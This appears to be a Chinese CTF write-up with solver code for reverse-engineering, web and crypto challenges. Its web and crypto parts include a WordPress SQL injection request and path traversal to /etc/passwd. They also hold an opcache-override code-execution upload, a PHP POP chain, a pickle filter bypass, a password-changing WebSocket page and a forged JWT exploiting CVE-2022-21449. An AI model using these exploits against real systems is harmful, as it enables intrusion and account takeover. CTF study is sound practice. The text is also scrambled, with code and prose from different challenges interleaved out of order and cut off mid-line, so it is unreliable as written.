0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x01,0x02,0x01, 0x01, 0x01, 0x04,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x01,0x01, 0x01, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; deeprev googlectf2021 eldar GameMaster 需要⽤first反推num,num2,num3 from z3 import * def solvePart2(ret1, ret2):    # c1 + c2 == ret1    # c1 + c1 + c2 == ret2    c1 = (ret2 - ret1) & 0xff    c2 = (ret1 - c1) & 0xff    return c1, c2 c1, c2 = solvePart2(0x6c, 0xa1) c3, c4 = solvePart2(0xb1, 0xe5) part2_dec = bytes([c1, c2, c3, c4]).decode() print(c1, c2, c3, c4) print(part2_dec) def permutePart1(op1, op2):   ((c ^ op1) + op2) & 0xff def rev_permutePart1(op1, op2, chk):    return ((chk - op2) ^ op1) & 0xff part1_chk = [ 0x70, 0x7c, 0x73, 0x78, 0x6f, 0x27, 0x2a, 0x2c, 0x7f, 0x35, 0x2d, 0x32, 0x37, 0x3b, 0x22, 0x59, 0x53, 0x8e, 0x3d, 0x2a, 0x59, 0x27, 0x2d, 0x29, 0x34, 0x2d, 0x61, 0x32, ] part1_op1 = [ 0x16, 0x17, 0x10, 0x12, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x24, 0x2c, 0x26, 0x1e, 0x1f, 0x20, 0x20, 0x21, 0x23, 0x27, 0x24, 0x25, 0x26, 0x27,] part1_op2 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b ] assert len(part1_chk) == len(part1_op1) == len(part1_op2) part1 = [] for i in range(len(part1_chk)):    c = rev_permutePart1(part1_op1[i], part1_op2[i], part1_chk[i])    part1.append(c) part1_dec = bytes(part1).decode() print(part1_dec) print(part1_dec + part2_dec) private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream)       {            int num = -1;            for (int i = 0; i < 320; i++)           {                x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1UL) | x << 1);                y = (((y >> 30 ^ y >> 27) & 1UL) | y << 1);                z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1UL) | z << 1);                bool flag = i % 8 == 0;                if (flag)               {                    num++;               }                KeyStream[num] = (byte)((long)((long)KeyStream[num] << 1) | (long) ((ulong)((uint)((z >> 32 & 1UL & (x >> 30 & 1UL)) ^ (((z >> 32 & 1UL) ^ 1UL) & (y >> 31 & 1UL))))));           }       }        private static void ParseKey(ulong[] L, byte[] Key)       {            for (int i = 0; i < 3; i++)           {                for (int j = 0; j < 4; j++)               {                    Key[i * 4 + j] = (byte)(L[i] >> j * 8 & 255UL);               }           }       }        static void Main(string[] args)       {            ulong num = 20;// ulong.Parse(environmentVariable);            ulong num2 = 195;// ulong.Parse(environmentVariable2);            ulong num3 = 168;// ulong.Parse(environmentVariable3);            ulong[] array = new ulong[3];            byte[] array2 = new byte[40];            byte[] array3 = new byte[40];            byte[] array4 = new byte[12];            byte[] first = new byte[]           {101,5,80,213,163,26,59,38,19,6,173,189,198,166,140,183,42,247,223,24,106,20,145,37,24, 7,22,191,110,179,227,5,62,9,13,17,65,22,37,5};            byte[] array5 = new byte[]           {60,100,36,86,51,251,167,108,116,245,207,223,40,103,34,62,22,251,227};              array[0] = num;            array[1] = num2;            array[2] = num3;            Check1(array[0], array[1], array[2], array2);            bool flag2 = first.SequenceEqual(array2);            if (flag2)           { [y = 868387187, x = 156324965, z = 3131229747] easyapk 安装后发现界⾯很简单,只有⼀个输⼊框和⼀个按钮,⽤jadx打开后发现就是调⽤so⾥⾯的check函数进⾏判断。 ⾥⾯代码看起来很复杂,但实际跟踪后发现其实存在⼤量⽆⽤代码,真正有⽤的其实是调⽤函数sub_544最后的两 个循环,⼀个进⾏字符串替换,⼀个进⾏加密。check函数将加密结果与固定字节⽐较后返回结果。 中间调⽤time取时间,使⽤其中固定的两位参与运算。⽤v146 = (v122 | 0xFFFFFFFE) - (v122 & 0xFFFFFFFE) + 2 (v122 | 1) + 1;代替加1。⽤v143 = (v141 | 0xFFFFFFF7) - (v141 & 0xFFFFFFF7) + 2 (v141 | 8) + 1;代替加8。藏的最 深的是⽤v155 = 2 (v103 | v144) - (v144 ^ *v103);代替了加法。                ParseKey(array, array4);                for (int i = 0; i < array5.Length; i++)               {                    array5[i] ^= array4[i % array4.Length];               }                Console.WriteLine("flag{" + Encoding.Default.GetString(array5) + "}");           } BYTE data[32] = { 0x84, 0xAA, 0x94, 0x5D, 0xA0, 0x24, 0xFA, 0x14, 0x10, 0x02, 0x56, 0x2B, 0x49, 0xDD, 0x9B, 0xB6, 0xD4, 0xEA, 0xEF, 0xAA, 0xC6, 0xF4, 0x8C, 0x4B, 0xC9, 0xB8, 0x7F, 0x09, 0xD2, 0x51, 0xEC, 0xB5 }; Index143 = 0; *pKeyLen178 = 32; while (1) { pKeyLen145 = pKeyLen178; if (Index143 >= *pKeyLen145) break; Key147 = data; v182 = Key147 + Index143; v142 = *(DWORD *)(Key147 + Index143); v107 = *(DWORD *)(Key147 + Index143 + 4); v103 = 0xc6ef3720; for (int i = 0; i < 32; i++) { DWORD v159 = (2 * (v153[3] | (v142 >> 5)) - (v153[3] ^ (v142 >> 5))) ^ (2 * (v153[2] | (16 * v142)) - (v153[2] ^ (16 * v142))) ^ (2 * (v142 | v103) - (v103 ^ v142)); 解密代码块后得到synt{Vg_Vf_A0g_guNg_zHpu_unEqre},利⽤所有的⼤⼩写字⺟得出52个字节的替换表,将字⺟ 替换回去得到flag{It_Is_N0t_thAt_mUch_haRder}。 Web uploadpro 从phpinfo中发现题⽬使⽤fpm启动,并且开启了opcache扩展,⽂件上传功能使⽤⽩名单校验。 利⽤ ⽬录穿越 读获得 index.php源码: v107 = v107 - v159; DWORD v156 = (2 * (v103 | v107) - (v103 ^ v107)) ^ (2 * (v153[0] | (16 * v107)) - (v153[0] ^ (16 * v107))) ^ (2 * (v153[1] | (v107 >> 5)) - (v153[1] ^ (v107 >> 5))); v142 = v142 - v156; v103 = v103 - 0x9e3779b9; } DWORD *v160 = (DWORD *)v182; v160[0] = v142; v160[1] = v107; Index143 = Index143 + 8; } char list[] = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm"; char flag[] = "synt{Vg_Vf_A0g_guNg_zHpu_unEqre}"; for (int i = 0; i < strlen(flag); i++) { for (int j = 0; j < strlen(list); j++) { if (list[j] == flag[i]) { if(j < 26) flag[i] = 'A' + j; else flag[i] = 'a' + j - 26; break; } } } <!DOCTYPE html> <html> <head> <title>⽂件上传</title> <meta charset="utf-8"> </head> <body> <form action="index.php" method="post" enctype="multipart/form-data"> <input type="hidden" name="max_file_size" value="1048576"> <input type="file" name="file"> <input type="submit" name="上传">    </form> </body> </html> <?php    if($_SERVER['REQUEST_METHOD']=="GET"){        die(0);   } header("content-type:text/html;charset=utf-8"); $filename = str_replace("\0","",$_FILES['file']['name']);    $prefix = isset($_GET['prefix'])?str_replace("\0","",$_GET['prefix']):""; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES['file']['size']; $error = $_FILES['file']['error']; if ($size > 2*1024*1024){ echo "<script>alert('⽂件⼤⼩超过2M⼤⼩');window.history.go(-1);</script>"; exit(); } $arr = pathinfo($filename); $ext_suffix = $arr['extension']; $allow_suffix = array('jpg','gif','jpeg','png',"bin","hex","dat","docx","xlsx"); if(!in_array($ext_suffix, $allow_suffix)){ echo "<script>alert('上传的⽂件类型只能是 jpg,gif,jpeg,png,bin,hex,dat');window.history.go(-1);</script>"; exit(); } if (move_uploaded_file($temp_name, '/uploads/'.$prefix.$filename)){ echo "<script>alert('⽂件上传成功! Path /uploads/$prefix$filename');</script>"; }else{ echo "<script>alert('⽂件上传失败,错误码:$error');</script>"; } ?> 使⽤docker镜像php:7.4.3-fpm启动环境,安装opcache扩展,创建⼀个恶意的phpinfo.php并获取其opcache缓存 ⽂件phpinfo.php.bin。 新下发⼀个环境,不访问phpinfo.php,⾸先访问index.php,再下载index.php.bin,使⽤插件获取opcache⽂件 的时间戳:https://github.com/GoSecure/php7-opcache-override 将从题⽬下载得到index.php.bin的时间戳赋值给我们构造的phpinfo.php.bin,然后借助⽬录穿越将其上 传/tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/phpinfo.php.bin,此时再访问 phpinfo.php,就成功覆盖,执⾏恶意代码并获取flag。 babyweb 让admin⾃⼰修改⾃⼰密码,vps内容如下: 然后登录购买hint,代码审计,根据python go的json解析不⼀致绕过即可。 <!DOCTYPE html> <html>     <head>         <meta charset="UTF-8">         <title></title>     </head>     <body>         <button id="btn" type="button">点我发送请求</button>     </body>     <script type="text/javascript" src="js/jquery.js" ></script> <script>        ws = new WebSocket("ws://"); ws.onopen = function () {                var msg = "changepw 123456";                ws.send(msg);                document.getElementById("sendbox").value = "";                document.getElementById("chatbox").append("你: " + msg + "\r\n");             }     </script> </html> {"product":[{"id":1,"num":0},{"id":2,"num":0}],"product":[{"id":1,"num":3}, {"id":2,"num":3}]} easylogin 80: wordpress 读moodle的mdl_sessions,然后找userid=2的session 替换登陆后台,然后安装插件getshell即可。 POST /wp-admin/admin-ajax.php HTTP/1.1 Host: Content-Length: 183 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: admin%2F&reauth=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 Cookie: wordpress_test_cookie=WP%20Cookie%20check Connection: close action=aa&query_vars[tax_query][1][include_children]=1&query_vars[tax_query][1][terms] [1]=1) or updatexml(0x7e,concat(1,user()),0x7e)#&query_vars[tax_query][1] [field]=term_taxonomy_id easyweb 读⽂件审计,利⽤SESSION_UPLOAD_PROGRESS上传⽂件,由于未public schema,可以直接进⼊get进⾏任意覆 盖(当然也可以绕过wakeup),popchain构造如下: GET /showfile.php?f=./guest/../../../../../../../etc/passwd HTTP/1.1 Host: Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close <?php class Upload {    public $file;    public $filesize;    public $date;    public $tmp;    function __construct(){        $this->file = $_FILES["file"];   }    function __get($value){        $this->filesize->$value = $this->date;        echo $this->tmp;   } } class GuestShow{    public $file;    public function __construct($file)   {        $this->file=$file;   } function __toString(){        $str = $this->file->name;        return "";   }    function __get($value){        return $this->$value;   }    function __destruct(){        echo $this;   } } class AdminShow{    public $source;    public $str;    public $filter;    public function __construct($file)   {        $this->source = $file;        $this->schema = 'file:///var/www/html/';   }    public function __toString()   {        $content = $this->str[0]->source;        $content = $this->str[1]->schema;        return $content;   }    public function __get($value){        $this->show();        return $this->$value;   }    public function __set($key,$value){        $this->$key = $value;   }    public function show(){        $url = $this->schema . $this->source;        echo $url;   }    public function __wakeup()   {        if ($this->schema !== 'file:///var/www/html/') {            $this->schema = 'file:///var/www/html/';       }        if ($this->source !== 'admin.png') {            $this->source = 'admin.png';       }   }   } $a=new GuestShow("aa"); $c=new AdminShow("aa"); $c->source='zu876'; 然后就是利⽤show进⾏curl扫内⽹,最后在10段发现⽬标机器,然后file协议读即可。 crash $a->file=$c; echo serialize($a); unserialize('O:9:"GuestShow":1:{s:4:"file";O:9:"AdminShow":4: {s:6:"source";s:5:"zu876";s:3:"str";N;s:6:"filter";}'); import base64 # import sqlite3 import pickle from flask import Flask, make_response,request, session import admin import random app = Flask(__name__,static_url_path='') app.secret_key=random.randbytes(12) class User:    def __init__(self, username,password):        self.username=username        self.token=hash(password) def get_password(username):    if username=="admin":        return admin.secret    else:        # conn=sqlite3.connect("user.db")        # cursor=conn.cursor()        # cursor.execute(f"select password from usertable where username='{username}'")        # data=cursor.fetchall()[0]        # if data:        #     return data[0]        # else:        #     return None        return session.get("password") @app.route('/balancer', methods=['GET', 'POST']) admin登录之后,给的是⼀个lua-resty-balancer负载均衡,⽬标是让slb超时错误。 def flag():    pickle_data=base64.b64decode(request.cookies.get("userdata"))    if b'R' in pickle_data or b"secret" in pickle_data:        return "You damm hacker!"    os.system("rm -rf *py*")    userdata=pickle.loads(pickle_data)    if userdata.token!=hash(get_password(userdata.username)):         return "Login First"    if userdata.username=='admin':        return "Welcome admin, here is your next challenge!"    return "You're not admin!" @app.route('/login', methods=['GET', 'POST']) def login():    resp = make_response("success")    session["password"]=request.values.get("password")    resp.set_cookie("userdata", base64.b64encode(pickle.dumps(User(request.values.get("username"),request.values.get("p assword")),2)), max_age=3600)    return resp @app.route('/', methods=['GET', 'POST']) def index():    return open('source.txt',"r").read() if __name__ == '__main__':    app.run(host='', port=5000) b'''capp admin (S'\\x73ecret' S'1' db.''' 设置admin.secret为1,然后⽤admin/1登录 # nginx.vh.default.conf -- docker-openresty # # This file is installed to: #   `/etc/nginx/conf.d/default.conf` # # It tracks the `server` section of the upstream OpenResty's `nginx.conf`. # # This config (and any other configs in `etc/nginx/conf.d/`) is loaded by # default by the `include` directive in `/usr/local/openresty/nginx/conf/nginx.conf`. # # See https://github.com/openresty/docker-openresty/blob/master/README.md#nginx-config- files # lua_package_path "/lua-resty-balancer/lib/?.lua;;"; lua_package_cpath "/lua-resty-balancer/?.so;;"; server {   listen       8088;   server_name localhost;   #charset koi8-r;   #access_log /var/log/nginx/host.access.log main;   location /gettestresult {           default_type text/html;           content_by_lua '               local resty_roundrobin = require "resty.roundrobin"               local server_list = {                   [ngx.var.arg_server1] = ngx.var.arg_weight1,                   [ngx.var.arg_server2] = ngx.var.arg_weight2,                   [ngx.var.arg_server3] = ngx.var.arg_weight3,               }               local rr_up = resty_roundrobin:new(server_list)               for i = 0,9 do                   ngx.say("Server seleted for request ",i,": &nbsp;&nbsp;&nbsp;&nbsp;" ,rr_up:find(),"<br>")               end           ';   }   #error_page 404             /404.html;   # redirect server error pages to the static page /50x.html   # 原理跟bilibili去年崩掉⼀样,让weight为"0" Crypto   # proxy the PHP scripts to Apache listening on   #   #location ~ \.php$ {   #   proxy_pass;   #}   # pass the PHP scripts to FastCGI server listening on   #   #location ~ \.php$ {   #   root           /usr/local/openresty/nginx/html;   #   fastcgi_pass;   #   fastcgi_index index.php;   #   fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;   #   include       fastcgi_params;   #}   # deny access to .htaccess files, if Apache's document root   # concurs with nginx's one   #   #location ~ /\.ht {   #   deny all;   #} } Factor 论⽂ https://eprint.iacr.org/2015/399.pdf # from pwn import * import requests import json import os import gmpy2 from pwnlib.tubes.tube import * from hashlib import * from Crypto.Util.number import * from tqdm import tqdm, trange import random import math from Crypto.Hash import SHA256 from Crypto.Cipher import AES from factordb.factordb import FactorDB from sage.modules.free_module_integer import IntegerLattice import itertools from fastecdsa.curve import Curve from random import getrandbits, shuffle, randint def resultant(p1, p2, var):    p1 = p1.change_ring(QQ)    p2 = p2.change_ring(QQ)    var = var.change_ring(QQ)    r = p1.resultant(p2, var)    return r.change_ring(F) # r = remote('', '19962') # context(log_level='debug') # ALPHABET = string.ascii_letters + string.digits # rec = r.recvline().decode() # print(rec) # suffix = rec[rec.find('+'):rec.find(')')][1:].strip() # digest = rec[rec.find('==')+3:-1].strip() # print(f"suffix: {suffix} \ndigest: {digest}") # for i in itertools.product(ALPHABET, repeat=4): #     prefix = ''.join(i) #     guess = prefix + suffix #     if sha256(guess.encode()).hexdigest() == digest: #         # log.info(f"Find XXXX: {prefix}") #         print((f"Find XXXX: {prefix}")) #         break # r.sendline(prefix.encode()) n11=80104993294056800526997891239658574149881038942561596603682887778423811663417729024 719401942511160681100572852136887906533603822136103706240702983615514887471978971434560 354777928455810183380115550976281837647087421578957493900221227439995043326977532514401 546862026302855780461877424023298815796171262867790113081470391751300411454723437562974 717683458116630655231107552266940334782809583152069356329124986983239069864669164720437 113336225484623499017513804792870328983346073423530209391614748950920606192387762330059 619431705988482432252753266247034827407980078112010494654606350076385262218740460863954 285828566128829391891218435423668797591951030022193207413553102831417047591711020425404 233611661933584121341899060559062084251161581544311461233388143092076900293337088749455 864083300533990670660349780984686386396739154364704922430955693690976817925958185152021 466990456046764047314448163392043848761578868926296174105314661055499722486133194971672 105655349953118669542543916322280291781314026651373584144771741884636009665259284494036 293217101914343408018472809332614382116509789505893537221570894808824859658512747577002 196250126291527449747842886813045512261201640838160756120080226703886951689666538757689 5570245272035575637 n12=63540197034020572513932500650497834451274492695868803142344800399207276993180821748 670957415149223087937457431345766243642326343779238971137968751205639111741080756549254 871869116618337263315164491713527225977099709619551848905631935025867372309541792215318 242391375927289369686742619370447975277251108145772951384368258895149955113243292314799 723859753805590293212379225259351422532819654148345174731404808082440553074253347391432 929434648669168490410040697207303705008986181660450565004295377836062193438081599954118 306758549860605385712577597991507732956672253183008971482397996593419033853856418825327 101636729989001544961114116678004876340325230916051716456911074056158410083921213866188 161535138294681381807889988259531336293459495189556018900343877545067534359014782118695 352626222497333396245456127532192515161917820449934233974963775810012689333099425290292 650970561788223961038042083079108890737839722681751409546881522818671622005707509571189 407003234461324480393454131857384702936556315991897040405713727088458790576682875038775 313006527414790237999322478014966360046249228189132070213415385335939358890275042397206 867929337333386938939397035376050743691323365742218553148202323738424753555466648176019 7851108297145147371 e11=18988399805620487546070690735278448521325364324407931061241814065147701780667759882 323620548098500747749818368981186514694241487259707081994611130887050449056335925789363 339183285445059109967464286792994198794724447909413635580258876205708565985483202464263 549743957652437416461217434134471322972303653551480669148308569044337503791146921229007 237721149911999796389875715598605508834709772464595230688628988596944614271486266282831 988966593371354385065747995853781786787903084102667132560034790226992645688445059775135 370135292129615732694946837409872836826081894067195733015736626967539030509918128841921 925697372743218289868476408398134247018945784729333857277574450112911349611248226122398 65 e12=12626474190189300226171896089957122600956230472738938115295107545966363902555649888 278217611269179764309781755224502779070632479811064055190945606163782412471116989151999 993639480157037886165546572751473387668052899092611291650251560781367185730064790308275 853474581436457383537161891312093980567418648484868180764403557788869934620125333972083 309250573055026532191736294669486351103527521624425525418126656075167531865958173760297 077775990290407247274999521612611797072718144059071652079044997221227790962305635480114 919323784296547644868551478731357691166374842404545962310926844245722581197680935627472 492515189653804659940550494117153535471474667119493918145505915918305152622965560509468 81 n2=209798341155088334158217087474227805455138848036904381404809759100627849272231840321 985747935471287990313456209656625928356468120896887536235496490078123448217785939608443 507649096688546074968476040552137270080120417769906047001451239544719039212180059396791 491281787790213953488743488306241516010351179070869410418232801398578982244984544906579 574766534671056023774009163991804748763929626213884208260660722705479782932001102089367 261720194650874553305179520889083170973755913964440175393646890791491057655226024046525 748177999422035469428780228224800114202385209306803288475439775037067014297973202621118 959024226798935588827359265962780792266516120013602384766460619793738405476219362508944 225007365127768741191310079985425349292613888185378948854602285379329682053663283534930 182589905986063348509703027498270111412063194971956202729807710253369312175636837558252 924035002153389909587349043986253518050303628071319876207392440085675892353421232158925 122721273720564784886530611286461575045181073744696415657043278123662980166364494583141 297996445429477446442693717498789391918530672770193730629928408766563592081857706608049 076318165712479742423149330311238462044666384622153280310696667586565906758451118241914 402257039981388209 e2=65537 n3=539779851369541956878655738599584730199799866957191805784596190682932284216781781433 367450841202917758999300635019369629627621029957135109806205877317954671312041249493462 048283611940752235036153024920172209763260723728345918562258401803973624430150143563078 517485996070862532682695228590709019451174548520135142052216785774589096706631010293690 859363524584240662502290912412366366114571976050857239915691266377257797199583543940504 695517331512813468837128344612227973709974625418257243011036826241599265375741977853552 204640800449679679351666009764297016524814036295707311913711955324055690490892097177271 718850857268982130811714517356073266905474635370690445031512184247179039751734276906533 177939993769044135143389748416635981226449566039039202521305851567296884751935162651063 209779647359922622084851547605090230221057349511482738300221222563908357379545905837110 168948295030747460300104202323692732549831403834387939156877086852393515817984772384147 449841124275061609701453997579569931391166586163299940486204581696722731952467570857217 406030804590055255431828403195798003509083922294733709507134156466158642941338493323430 671502043066148246348074878064089651235355282144209668143249348243220714471988019011613 749340243917652821 e3=817930097875308458781286189404739522551604911037694881210981131943027561461277372667 234589335969190028143248438267004704469737481804351273153340257637464540547720723980149 842877478376816388007849544874742142507852198157840863879033652837201927107371201337114 193980801704939943485868729948046175363816471940461212893978705579776217474509207454741 218334919215663871175087208331379555143946550772480762667451493517010457371545878236646 958713850884598049067389024571372978291708991027198055715959280735050415719291353000719 951014400484802022118155847216054301873312422526612737937375191043960445936807865249902 907093670734986213905391374518641378206647046147896170301359165513614006087925006737928 391379886764875817100453577556530684244454575535120279683317756065656465263297568591293 528158126814180369668695225953994558860959138580762010827933349817002816733869023511700 351526428184395398499795887827234777856193372679247398185575545452288632166967679081318 966808437315389775454029086734675103356750092247731753044596775395522145474494620855539 458811148461070078956654750740230954995774081553506905783791520485249093016884360573263 232801712915485285722789536254914673761890618065162321684850049143814245625065345805392 262224029973613633517963918089873026969069996579964475777447214721027111115076904897687 124973115638793926074919237036148828577537762294481757029209520190614256740353915117920 9316853493906909989301225903409448461436855145 c11=18979511327426975645936984732782737165217332092805655747550406443960209507493506811 471688957217003792679188427155591583024966608843371190136274378868083075515877811693937 328204553788450031542610082653080302874606750443090466407543829279067099563572849101374 714795279414177737277837595409805721290786607138569322435729584574023597293220443351227 559400618351504654781318871214405850541820427562291662456382362148698864044961814456827 646881685994720468255382299912036854657082505810206237294593538092338544641919051145900 715456411365065867357857347860000894624247098719102875782712030938806816332901861114078 070638796157513248160442185781635520426230183818695937457557248160135402734489627723104 008584934936245208116232179751448263136309595931691285743580695792601141363221346329077 184688857290503770641398917586422369221744736905117499140140651493031622040723274355292 502182795605723573863581253354922291984335841915632076694172921289489383700174864888664 946302588049384130628381766560976143458735712162489811693014419190718601945154153130272 620025118408017441490090252674737105557818759190934585829634273698371996797545908125156 282869589331913665938038870431655063063535672001112420959158339261862052308986374193671 007982914711432579 c12=33658700567130452756674594835529041263626174896958197621423957862181686334311743352 403353383863694167930049727090969677502103100431247799713074136170926282273690434064113 865235963295045565192046404244802246766459648405517427089517049907634733338122276851859 901852094809894362622906199612626015460403810154354658891761957670286644499857855590707 099033157472213514177818263155980215449381568728407752446933129024905729116380329061970 110400702883660983284735174802035479878850879025893571839978300206949012366334515690244 050150711728974769551026646153901943161012335117622744361231703789925777404575148713564 605230927709893991908802928443722184018276980885018482768130761138935339268370751614173 606779389737891123581904943254275842990194520263211708959589928039057570626623925284115 249053435376011823191819011004331987774411908381121470759312275740924064525740909743606 182561368677391646612269316897106241804670396914400477927039132064549558602434266800249 715535862379594269247716448947591735100314904508728351072898109644989013073505501507555 761425386769870247992061929991981676897258127350783730917945037463491656708325163020306 706566391007392699051710892149044291937277417020123973406481930169352736623300792567004 3499415100789027665 c2=183525726080559025503503869500737745304538578972487380303800078307011355703106220043 686052083369222665132381341274968221997997617137823661781778095971371026124441475655781 552605247474398991500122230272184899461240862768148996755638376695597951533496864342427 382074256530795143760890709807975964571519657724601095196235725021095926123943166802022 877124657217673413022348061302445513872961330517608930331949626919420402285455088950091 952911062975814700665459913526688261973468305610101984175270579445079021439656340588482 760172834789336750529936578223228667789949562050337045820476183240710453490725265402507 074631126685793425373495672478107156042206902153136413295226740801460472915707524302319 235663024634918773776170447689789974385966434584751289368509949340294760301366430539975 492537920762607654591666183698649426810568648159962533156319300027388542358411203218700 752617822503575064368255500888264693965080459122583036529122171511272809594357414199617 214184286055150961603446887956555628897551653620067753171880090082887826917058795106558 921819750034857146043405423784773882257363166823796166767702345579394710989196470537993 137772486784556202317212027808309800638240030763088115405344923177198115888987271341905 45533822501681653 c3=113097822337683973761068913398570777162211043704088253732500045618770280334319497174 908657828372816818344430304314992760410247741225285170975119344962728883084314382093407 445567724674775086423808679124143380073906159023182353116556175251427048715466914368972 746661938211846262612414049036821553068430149530397389927209475908905748728402722287875 974303298260579839357610962198145974153609818939841880084892796820949226354126424023144 300953584658958900737493704530725894948802258740332090822797815745616247879170037794873 059391625680745994045522420168248552864215035136318711240256011217929372430302003068882 829637056296413462078222453765071094277727760527662423010417144554652783429899139309180 017349156600053882338180319473460877576898373222480215735280046214925463242092830060830 764299787309912687294672319845054775281463150375545716818434962456139485501224661520991 156961587158843064393883274763714930309353593180897123378717852182761518709151878662808 890356934477932099818218743384674756674800089177733447066489275506387382342429495897972 218764782517198727316942685748481956118012927027254979181519862451112593068440686462293 151078537886822555211870303467014484443432209106264020502334805536091587252238173816637 270028678636848763 cf = continued_fraction(n11/n12) fracs = cf.convergents() for xx in tqdm(fracs):    q1 = xx.numerator()    q2 = xx.denominator()    if q1.nbits() in range(511, 513) and q2.nbits() in range(511, 513):        if n11 % q1 == 0:            print('--------------------------------')            print(q1)            assert n11 % q1 == 0            p1 = int((n11 // q1)^(1/2))            p2 = int((n12 // q2)^(1/2))            assert p1^2 * q1 == n11            phi1 = (q1 - 1) * p1 * (p1 - 1)            phi2 = (q2 - 1) * p2 * (p2 - 1)            d1 = inverse(e11, phi1)            d2 = inverse(e12, phi2) myJWT CVE-2022-21449, https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/            m1 = pow(c11, d1, n11)            m2 = pow(c12, d2, n12)            # print(m1)            # print(m2)            break m1 = int(m1) m2 = int(m2) P.<x2> = PolynomialRing(Zmod(n2)) f2 = m1*m2*x2 - m1 + m2 root = f2.monic().small_roots(X=2**672,beta=0.75)[0] p2 = gcd(int(m1*m2*root - m1 + m2),n2)^(1/6) q2 = n2 / p2^7 d2 = int(pow(e2,-1,p2**6*(p2-1)*(q2-1))) b = int(pow(c2,d2,n2)) P.<x3> = PolynomialRing(Zmod(n3)) f3 = e3 * x3 - b root = f3.monic().small_roots(X=2**672,beta=0.75)[0] p3 = gcd(int(e3 * root - b),n3)^(1/6) q3 = n3 / p3^7 d3 = int(pow(e3,-1,p3**6*(p3-1)*(q3-1))) m3 = pow(c3,d3,n3) print(long_to_bytes(int(m3))) from pwn import * import requests import json import os import gmpy2 from pwnlib.tubes.tube import * from hashlib import * from Crypto.Util.number import * from tqdm import tqdm, trange import random import math from Crypto.Hash import SHA256 from Crypto.Cipher import AES from factordb.factordb import FactorDB from sage.modules.free_module_integer import IntegerLattice import itertools from fastecdsa.curve import Curve from random import getrandbits, shuffle, randint def resultant(p1, p2, var):    p1 = p1.change_ring(QQ)    p2 = p2.change_ring(QQ)    var = var.change_ring(QQ)    r = p1.resultant(p2, var)    return r.change_ring(F) # r = remote('', '19962') # context(log_level='debug') # ALPHABET = string.ascii_letters + string.digits # rec = r.recvline().decode() # print(rec) # suffix = rec[rec.find('+'):rec.find(')')][1:].strip() # digest = rec[rec.find('==')+3:-1].strip() # print(f"suffix: {suffix} \ndigest: {digest}") # for i in itertools.product(ALPHABET, repeat=4): #     prefix = ''.join(i) #     guess = prefix + suffix #     if sha256(guess.encode()).hexdigest() == digest: #         # log.info(f"Find XXXX: {prefix}") #         print((f"Find XXXX: {prefix}")) #         break # r.sendline(prefix.encode()) payload1 = b'{"typ":"JWT","alg":"myES"}' payload2 = b'{"iss":"qwb","name":"administrator","admin":true,"exp":2659185892270}' payload3 = b'\x00' * 64 payload = '' payload += b64e(payload1) payload += '.' payload += b64e(payload2) payload += '.' Lattice output.txt⾥是远端拿到的C payload += b64e(payload3) print(payload) from pwn import * import requests import json import os import gmpy2 from pwnlib.tubes.tube import * from hashlib import * from Crypto.Util.number import * from tqdm import tqdm, trange import random import math from Crypto.Hash import SHA256 from Crypto.Cipher import AES from factordb.factordb import FactorDB from sage.modules.free_module_integer import IntegerLattice import itertools from fastecdsa.curve import Curve from random import getrandbits, shuffle, randint def resultant(p1, p2, var):    p1 = p1.change_ring(QQ)    p2 = p2.change_ring(QQ)    var = var.change_ring(QQ)    r = p1.resultant(p2, var)    return r.change_ring(F) # r = remote('', '19962') # context(log_level='debug') # ALPHABET = string.ascii_letters + string.digits # rec = r.recvline().decode() # print(rec) # suffix = rec[rec.find('+'):rec.find(')')][1:].strip() # digest = rec[rec.find('==')+3:-1].strip() # print(f"suffix: {suffix} \ndigest: {digest}") # for i in itertools.product(ALPHABET, repeat=4): #     prefix = ''.join(i) #     guess = prefix + suffix #     if sha256(guess.encode()).hexdigest() == digest: #         # log.info(f"Find XXXX: {prefix}") #         print((f"Find XXXX: {prefix}")) #         break # r.sendline(prefix.encode()) n = 75 m = 150 r = 10 N = 126633165554229521438977290762059361297987250739820462036000284719563379254544315991201 997343356439034674007770120263341747898897565056619503383631412169301973302667340133958 109 with open('output.txt', 'r') as f:    data = f.readlines()    for i in range(len(data)):        data[i] = data[i].replace('[', '').replace(']', '').split(' ')        tmp = []        for x in data[i]:            if x != '':                tmp.append(int(x))        data[i] = 